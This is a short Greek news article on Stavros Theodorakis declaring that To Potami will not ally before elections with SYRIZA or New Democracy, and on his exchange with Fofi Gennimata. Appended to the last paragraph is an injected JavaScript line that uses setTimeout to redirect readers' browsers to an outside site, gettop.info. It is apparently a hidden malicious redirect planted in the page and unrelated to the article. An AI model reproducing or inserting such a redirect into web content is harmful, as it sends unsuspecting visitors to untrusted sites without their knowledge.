Θεοδωράκης: Το Ποτάμι δεν θα συμπράξει προεκλογικά ούτε με τον ΣΥΡΙΖΑ ούτε με τη ΝΔ

0
3

 

Ο Σταύρος Θεοδωράκης οριοθέτησε τη θέση του Ποταμιού απέναντι στον ΣΥΡΙΖΑ και τη ΝΔ, τονίζοντας ότι σε καμία περίπτωση δεν θα συμπράξει προεκλογικά με κάποιο κόμμα. «Το Ποτάμι θα κατέβει αυτόνομο μαζί με τους συμμάχους του, εκτός αν καταφέρουμε να δημιουργήσουμε ένα τρίτο εκσυγχρονιστικό και μεταρρυθμιστικό πόλο», τόνισε μιλώντας στον ΣΚΑΪ.

Στην κατεύθυνση αυτή επανέλαβε την πρόταση για κοινή συνέντευξη Τύπου με τη Φώφη Γεννηματά στις 20 Σεπτεμβρίου ώστε να ξεκινήσουν χωρίς καθυστέρηση οι διαδικασίες για την εκλογή αρχηγού από την κοινωνία.

Ερωτώμενος για τα όσα λέει η κ. Γεννηματά για τις σχέσεις του με τη ΝΔ, ο Σταύρος Θεοδωράκης είπε γελώντας: «Μην μπερδευτούμε. Είναι και πρωί. Η κ. Γεννηματά ήταν υπουργός της Δεξιάς. Υπουργός μίας κυβέρνησης που είχε πρώτο ρόλο η ΝΔ. Πριν ανακαλύψουν, το χάος συγκυβερνούσαν με τη ΝΔ».

Ο Σταύρος Θεοδωράκης επανέλαβε ότι η λύση για τη χώρα δεν είναι η κυβερνητική συνεργασία με τους «ΣΥΡΙΖΑΝΕΛ» αναφέροντας ενδεικτικά τα όσα συμβαίνουν στο χώρο της παιδείας: «Διώχνουν από τα πανεπιστήμια καταξιωμένους καθηγητές για να κάνουν το χατίρι αιώνιων φοιτητοπατέρων. Αν όμως δεν φροντίσουμε την παιδεία δεν θα βγούμε ποτέ από την κρίση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here